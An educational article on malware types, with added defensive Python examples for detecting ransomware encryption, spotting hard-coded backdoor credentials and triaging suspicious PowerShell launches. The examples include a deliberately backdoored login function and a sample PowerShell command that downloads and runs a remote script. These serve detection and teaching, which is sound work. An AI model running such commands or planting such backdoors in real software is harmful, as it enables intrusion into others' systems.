Computers run programs under the control of an operating system, which sets the rules for what those programs may do. Just as the human body's immune system is vulnerable to new viruses and their mutations, computers are prone to malware infections. This article covers the basics and the different types of malware.
Malware usually gets onto a device by exploiting a software vulnerability or by tricking a user into running it. Once there, it can tamper with legitimate programs, damage files and steal or destroy essential information.
What is Malware?
Malware is short for malicious software: programs or code deliberately created to harm a computer, a network or their users. Such programs can record keystrokes, alter programs or settings, and steal, delete, modify or encrypt sensitive information, including financial data.
The idea behind malware dates back to 1949, when the mathematician John von Neumann theorised that computing machines could reproduce themselves using elements of their environment. Since the turn of the century, malware has evolved rapidly as the fast-growing web offered new and profitable ways to monetise it.
Malware attacks a computer, network or server in many ways. It is designed to get into a system so that criminals can re-enter the network whenever convenient. Once it controls the host, it sends confidential information, images and intellectual property back to its operator.
Over the years malware authors have shown great creativity, giving rise to attacks that range from locking victims out of their own data for a ransom to silently collecting user activity data.
Different Types of Malware
The most familiar types are computer viruses, worms, ransomware, keyloggers, trojan horses and spyware. Others include fileless malware, adware, rootkits, bots, RAM scrapers and mobile malware.
Computer viruses
A computer virus is malware that, when executed, replicates by inserting its own code into legitimate programs or host files; once the insertion succeeds, that program or file is infected. This makes viruses tricky to deal with: the malicious code runs inside a legitimate program, and removing it can break the underlying system. Anti-virus software deals with this by disinfecting, quarantining or deleting the infected file.
True file-infecting viruses are now a relatively uncommon form of malware, and not every malicious program is a virus, even though the word is often used loosely for all malware.
Computer worms
A computer worm is a self-replicating malicious program that spreads across a network by copying itself to other hosts. A single opened worm-laden email attachment can seed an infection that then works its way through an entire company on its own.
Worms predate email-borne malware (the Morris worm spread across the early Internet in 1988), but they became a mass phenomenon in the late 1990s and early 2000s, when worms arriving as email attachments routinely breached corporate defences.
Well-known worms include ILOVEYOU, SQL Slammer and Stuxnet. Beyond their payload, worms cause damage simply through the traffic they generate, saturating networks and knocking dependent systems offline. Unlike viruses, they spread without any end-user action. We have covered famous computer worms and fun facts in a separate article.
Ransomware
Ransomware takes control of a victim's computer and locks its software and files, typically by encrypting them. The attacker then demands payment to restore access, promising to hand over a unique decryption key once paid; whether they actually do is entirely up to them.
Paying is strongly discouraged, although some businesses and even government organisations have done so. Should you pay? Decide that in your security strategy before an incident rather than under pressure during one, and bear in mind that a payment to a sanctioned group may itself carry legal risk.
Famous ransomware families include Ryuk, Locky, WannaCry and NotPetya. Most ransomware is delivered as a trojan, meaning it arrives through social engineering (phishing, malicious USB drives, vishing and so on); WannaCry and NotPetya were the exceptions that spread as worms. Once on the target system, ransomware usually encrypts the user's files within minutes, although some families first observe the environment for hours or days. Operators commonly delete or encrypt every backup they can reach before triggering encryption, and size the ransom to what they judge the victim can pay.
Without a robust backup, the damage is hard to reverse: decrypting files without the key is rarely feasible, and recovery requires tools, time and expertise. Fortunately, ransomware is preventable, and the single best protection is an offline backup of essential files, kept disconnected so that an infected machine cannot reach it, with restores tested regularly.
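To make the "encrypted within minutes" behaviour concrete, here is an added example (not from the original article) of the kind of canary check a defender can run: it compares two snapshots of a folder and flags files whose content has become near-random or whose names have gained a ransom suffix. The entropy threshold, the suffix list and the two snapshots are constructed assumptions for illustration.

```python
"""Canary check for ransomware activity: files turning into ciphertext.

Added example for illustration; thresholds and sample data are assumptions.
"""
import math
import random
from collections import Counter

# Bits of entropy per byte above which content is treated as encrypted (or
# compressed). English text sits around 4-5; office documents stay below 7.
ENTROPY_THRESHOLD = 7.2
# Suffixes ransomware families commonly append; illustrative, not exhaustive.
RANSOM_SUFFIXES = {".locked", ".encrypted", ".crypt"}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 empty, 8.0 max)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(path: str, data: bytes) -> bool:
    """Near-random content or a known ransom suffix both count as a hit."""
    suffix = path[path.rfind("."):].lower() if "." in path else ""
    return suffix in RANSOM_SUFFIXES or shannon_entropy(data) >= ENTROPY_THRESHOLD


def newly_encrypted(before: dict, after: dict) -> list:
    """Paths in `after` that look encrypted but did not in `before` (or are new)."""
    hits = []
    for path, data in after.items():
        if looks_encrypted(path, data):
            old = before.get(path)
            if old is None or not looks_encrypted(path, old):
                hits.append(path)
    return sorted(hits)


def affected_fraction(before: dict, after: dict) -> float:
    """Share of the original files that vanished or became ciphertext."""
    if not before:
        return 0.0
    hit = sum(1 for p in before if p not in after or looks_encrypted(p, after[p]))
    return hit / len(before)


# Constructed snapshots: {path: content}. The 'ciphertext' is deterministic
# pseudo-random bytes standing in for real encrypted output.
_rng = random.Random(1)
_CIPHERTEXT = bytes(_rng.getrandbits(8) for _ in range(4096))
_INVOICE = b"Invoice 1042\nAmount due: 1,250.00 GBP\nPayable within 30 days\n" * 30
_NOTES = b"Quarterly planning notes, see shared drive.\n" * 50

BEFORE = {"docs/invoice.txt": _INVOICE, "docs/notes.txt": _NOTES}
AFTER = {"docs/invoice.txt.locked": _CIPHERTEXT, "docs/notes.txt": _NOTES}

if __name__ == "__main__":
    print("newly encrypted:", newly_encrypted(BEFORE, AFTER))
    print("fraction of originals affected:", affected_fraction(BEFORE, AFTER))
```

In practice the same two signals (a jump in entropy and a burst of renames) drive the "honeypot file" alerts in endpoint products; the threshold is deliberately set well above what ordinary documents reach, so legitimately compressed archives are the main source of false positives.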
Keyloggers
Keyloggers record a user's keystrokes. Once installed, they can capture passwords, user IDs, banking details and other sensitive information, so they are used mainly for information theft and covert monitoring. They arrive through social engineering, phishing or malicious downloads from compromised websites.
The media have also highlighted the controversial use of keyloggers by some employers to monitor staff, and keylogger vendors increasingly market to parents and guardians.
This leads to a common question: are keyloggers legal at work?
In many jurisdictions employers may monitor activity on company-owned equipment, subject to local law and notification requirements, although the practice is not widespread. On a personal computer, you may install a keylogger only on a machine you own. Using keyloggers for criminal purposes is illegal, and you must never deploy them on systems you are not authorised to monitor.
Trojan horse
A trojan horse is malware disguised as desirable code or software; Emotet is a well-known example. Trojans spread through social engineering, typically spam email, and have replaced worms as the criminals' weapon of choice. Trojans are among the oldest malware categories and today infect more computers than any other type.
Email is the most common delivery route: the victim either opens a trojan attachment or is redirected to a website that serves it. The fake antivirus program is one of the most prevalent trojans. It pops up while the victim is using the computer, claims to have found an infection and instructs the user to run a 'clean-up' program; when the user complies, the trojan executes and goes about its real business.
Another trojan variety popular with criminals is the Remote Access Trojan (RAT), which opens a backdoor connection for its operators. RATs are installed after the victim is lured into executing an email attachment or installing a new application or game. The decoy program installs and works normally while, behind the scenes, a backdoor gives its controllers access to the machine.
Spyware
Spyware collects information about user activity without the user's knowledge. Its use is not limited to cyber criminals: private organisations also deploy such programs to track the activity of a user, device or computer. DarkHotel is an example of spyware that targeted business travellers through hotels' in-house Wi-Fi networks.
Spyware may do less direct damage than other malware, but it reaches a computer the same way, through social-engineering lures, just as trojans do. A user who discovers spyware should treat it as a sign that the device has a weakness to be managed; anti-virus solutions can usually identify and remove it.
Backdoors
A backdoor is a covert channel that bypasses authentication or other security controls of a program or device. Like the back door of a building, it admits whoever knows where it is.
Manufacturers have sometimes shipped backdoors deliberately, for example to let support staff reset user passwords or push firmware upgrades in an emergency. Even so, backdoors are considered poor practice precisely because they are secret.
Once discovered, or once they fall into the wrong hands, backdoors give criminals unfettered access to the product, making it easy to gain entry, modify data or exfiltrate sensitive information.
Examples of some of the most famous backdoors:
- The Sercomm backdoor listening on TCP port 32764, found in many DSL routers
- The PGP full-disk encryption backdoor
- Backdoors added to pirated copies of premium WordPress plug-ins
- A backdoored Joomla plug-in
- The widely used open-source ProFTPD server, whose distribution was backdoored in 2010
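The simplest software backdoor is a credential check with a hidden second path. The added example below (not from the original article or any of the products listed) shows such a check beside a hardened replacement, plus a small static check that hunts for the pattern in source code. The maintenance password, user table, salt and the reviewed snippet are all constructed for illustration.

```python
"""An authentication backdoor beside its hardened replacement.

Added example; the fake maintenance credential, user table and salt are
constructed for illustration.
"""
import ast
import hashlib
import hmac

_ITERATIONS = 100_000
_SALT = b"constructed-salt"  # a real system stores a random salt per user


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, _ITERATIONS)


# Constructed user store: username -> (salt, PBKDF2 hash).
USERS = {"alice": (_SALT, _hash_password("correct horse battery staple", _SALT))}
_DUMMY = (_SALT, b"\x00" * 32)  # used for unknown users so timing stays uniform


def login_with_backdoor(username: str, password: str) -> bool:
    """Vulnerable: a 'maintenance' password left in the code works for any username."""
    if password == "s3rv1ce-m41nt":            # the backdoor
        return True
    record = USERS.get(username)
    if record is None:
        return False
    salt, stored = record
    return _hash_password(password, salt) == stored   # also a timing-unsafe comparison


def login_hardened(username: str, password: str) -> bool:
    """Only the stored credential decides, and the comparison is constant-time."""
    salt, stored = USERS.get(username, _DUMMY)
    candidate = _hash_password(password, salt)
    # Both operands are computed every time; no shortcut for unknown users.
    return hmac.compare_digest(candidate, stored) and username in USERS


SECRET_NAMES = ("pass", "secret", "token", "key")


def find_hardcoded_credential_checks(source: str) -> list:
    """Static check: lines where a secret-looking variable is compared to a string literal."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Compare):
            continue
        operands = [node.left, *node.comparators]
        names = [op.id.lower() for op in operands if isinstance(op, ast.Name)]
        has_literal = any(isinstance(op, ast.Constant) and isinstance(op.value, str)
                          for op in operands)
        if has_literal and any(k in n for n in names for k in SECRET_NAMES):
            hits.append(node.lineno)
    return hits


# Constructed snippet standing in for a code base under review.
SNIPPET = '''
def login(username, password):
    if password == "s3rv1ce-m41nt":
        return True
    return check_db(username, password)
'''

if __name__ == "__main__":
    print("backdoor accepts anyone:", login_with_backdoor("mallory", "s3rv1ce-m41nt"))
    print("hardened rejects it:", not login_hardened("mallory", "s3rv1ce-m41nt"))
    print("suspicious lines in snippet:", find_hardcoded_credential_checks(SNIPPET))
```

The static check is deliberately crude (a name containing "pass" compared to any string literal), which is exactly the kind of rule a code-review grep or a linter plug-in should raise for a human to look at; a backdoor hidden behind an environment variable or a hashed literal needs a reviewer, not a regex.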
Fileless malware
'Fileless' describes how the malware operates rather than what it does. Instead of writing new files to disk, fileless malware lives in operating-system objects (for example registry keys, scheduled tasks or APIs) or in memory alone. Some vendor reports put fileless techniques in more than half of the attacks they observe.
These attacks typically start by abusing a program that is already running and trusted, launching the malicious code as one of its child processes, or by turning legitimate tools built into the operating system against it. Examples of fileless malware include Astaroth and, historically, Frodo and The Dark Avenger.
Fileless attacks are harder to detect because they piggyback on legitimate scripts or hide inside scripts that call back to the attacker's server. PowerShell is particularly popular for this because it can download a script and execute it entirely in memory without ever writing it to disk.
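The detection side of the PowerShell point above, as an added example that is not part of the original article: a small triage routine over process-creation records (the fields you would get from Windows event 4688 or Sysmon event 1) that decodes -EncodedCommand arguments, looks for the usual in-memory download-and-execute idioms, and treats an Office parent process as an extra signal. The three records, the indicator list and the scoring are constructed assumptions.

```python
"""Triage process-creation records for fileless PowerShell tradecraft.

Added example; the records below are constructed, not real telemetry.
"""
import base64
import binascii
import ntpath
import re

# Abbreviations PowerShell accepts for -EncodedCommand.
ENC_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INDICATORS = [
    (re.compile(r"\biex\b|invoke-expression", re.I), "runs downloaded text as code (IEX)"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
     "fetches a payload over the network"),
    (re.compile(r"frombase64string", re.I), "decodes an embedded base64 blob"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-nop\b|-noprofile", re.I), "profile bypass"),
    (re.compile(r"-(ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"reflection\.assembly", re.I), "in-memory assembly load"),
]


def decode_encoded_command(arg: str):
    """Script behind a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    try:
        return base64.b64decode(arg, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyse(record: dict) -> dict:
    """Score one record {parent, image, cmdline}; score is the number of reasons found."""
    if ntpath.basename(record["image"]).lower() not in {"powershell.exe", "pwsh.exe"}:
        return {"score": 0, "reasons": []}
    reasons = []
    text = record["cmdline"]
    tokens = text.split()
    for flag, arg in zip(tokens, tokens[1:]):
        if flag.lower() in ENC_FLAGS:
            script = decode_encoded_command(arg)
            if script is not None:
                reasons.append("encoded command decodes to: " + script.strip())
                text += " " + script            # inspect the decoded script as well
    if ntpath.basename(record.get("parent", "")).lower() in OFFICE_PARENTS:
        reasons.append("spawned by an Office application (likely a macro)")
    reasons += [label for pattern, label in INDICATORS if pattern.search(text)]
    return {"score": len(reasons), "reasons": reasons}


def suspicious(records: list, threshold: int = 3) -> list:
    """Records scoring at or above the threshold, highest first."""
    scored = [(analyse(r)["score"], i, r) for i, r in enumerate(records)]
    return [r for s, _, r in sorted(scored, key=lambda t: (-t[0], t[1])) if s >= threshold]


# Constructed sample. The encoded command is built here so the record is readable.
_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
_B64 = base64.b64encode(_SCRIPT.encode("utf-16le")).decode("ascii")
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
RECORDS = [
    {"parent": r"C:\Windows\explorer.exe", "image": _PS,
     "cmdline": r"powershell.exe -NoLogo -File C:\scripts\nightly-backup.ps1"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "image": _PS,
     "cmdline": "powershell.exe -nop -w hidden -enc " + _B64},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": _PS,
     "cmdline": 'powershell.exe -ExecutionPolicy Bypass -Command "' + _SCRIPT + '"'},
]

if __name__ == "__main__":
    for r in suspicious(RECORDS):
        print(analyse(r)["score"], r["cmdline"][:60], analyse(r)["reasons"])
```

Two practical points the example encodes: the base64 must be decoded as UTF-16LE (not UTF-8) because that is what PowerShell expects, and the decoded text has to be fed back through the same indicators, otherwise the encoded record would score only on its command-line switches. Enabling script-block logging (event 4104) gives you the decoded script directly and is the better long-term source.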
Adware
Adware uses unsolicited advertising techniques. It is listed among malware types even though most adware is not malicious in itself. Adware typically redirects a compromised user's browser searches to look-alike web pages that carry adverts for other products.
Common examples are pop-up product advertisements and 'free' applications bundled with adware.
Malvertising
Malvertising, or malicious advertising, uses online adverts as the route to infect systems, generally by injecting unwanted or malicious code into ads. It abuses legitimate adverts or ad networks to deliver malware to target computers unnoticed: criminals may simply pay to place a malicious advert on a legitimate website, and an unsuspecting user who clicks it ends up with malware on their PC. The Angler Exploit Kit is one of the best-known payloads delivered this way.
In other cases the infection is a drive-by download: the malware in the advert executes automatically without the user doing anything. Criminals have gone as far as compromising the ad networks that serve adverts to many websites, turning popular sites into vectors for malicious ads. Malvertising has proven lucrative because it lets criminals spread other malware, such as ransomware or banking trojans, to unsuspecting users at scale.
Rootkits
A rootkit gives attackers remote control over a victim's computer. Its distinguishing feature is that it operates at the operating-system level or below, which hands the rootkit's handlers complete control of the system (administrative privileges) while hiding their presence from the user and from security tools.
Rootkits spread through malicious downloads, compromised shared devices, malicious attachments and phishing. They can be embedded in applications, the kernel, the boot record, virtual machines or firmware, and they often serve as a hideout for other malware such as keyloggers. Zacinlo is a rootkit that infected systems when users unknowingly installed a fake VPN app.
Bots and Botnets
Bots are automated programs, often combining trojan and worm traits, that perform tasks on command. They can be benign, such as the bots that index the web for search engines, but when built for malicious ends they become self-propagating malware that connects back to a central server. A botnet is a network of such bots under remote control, used to launch large-scale attacks such as DDoS floods. The well-known Mirai botnet exploited insecure IoT devices and other systems, recruiting them into an attacker-controlled network used for further large-scale attacks.
Mobile malware
Malware targeting mobile devices is as diverse as that targeting computers and includes mobile ransomware, spyware, trojans and madware, the aggressive advertising malware aimed at smartphones and tablets.
Mobile malware is distributed through phishing, malicious application downloads and similar routes. Jailbroken or rooted phones are especially vulnerable because they lack the protective features of the device's original operating system. Triada is an example: a modular Android trojan that uses root privileges to replace system files and change configuration settings.
RAM scrapers
As the name suggests, RAM scrapers mine data that is held temporarily in memory (RAM). They target point-of-sale systems such as cash registers, because POS software may hold card numbers unencrypted in memory for a short time before encrypting them and passing them to the back end.
How does malware attack and spread?
The most common ways malware spreads are:
- Vulnerabilities: malware exploits weaknesses in a system, network or hardware component to gain access and then follows the attacker's instructions. The initial foothold often lacks administrator or root privileges, so the attacker then uses privilege-escalation techniques (a local vulnerability, a misconfiguration, stolen credentials) to gain full control.
- Backdoors: a secret entry route into hardware, software or a network, left either intentionally or by accident.
- Drive-by downloads: malware downloaded and executed without the user's knowledge, simply by visiting a compromised website; opening a malicious email attachment achieves the same result with one click.
- Flat networks: organisations whose network has no internal firewalling or other segregation to control traffic flows. Without defence in depth, an infection on one machine spreads easily across the whole network.
- Hybrid threats: characteristics of several malware types combined to evade detection and maintain a long-term foothold on victim computers.
How to find and remove malware?
Whether it is practical to identify and remove malware by hand depends on the infection. With a traditional trojan, virus or worm it is usually possible to find the running program and trace the processes and events back to work out what happened. Fileless malware makes this far harder.
Even after a careful clean-up, remnants of malicious code may survive on the infected computer. It is therefore usually safer to reimage the system or restore it from a known-good backup than to trust a cleaned machine, which is one more reason to keep regular backups.
Preventing malware attacks requires several items on your action list:
- Patch management
- Office macros protection
- Vulnerability management
- Secure configuration baselines
- Secure remote access
- User education
- Multi-factor authentication on external and business-critical assets
- Endpoint protection
- Segregation at user, network and environment levels
- Web and email filtering
- Logging and monitoring controls
- Regular backups and test backup restore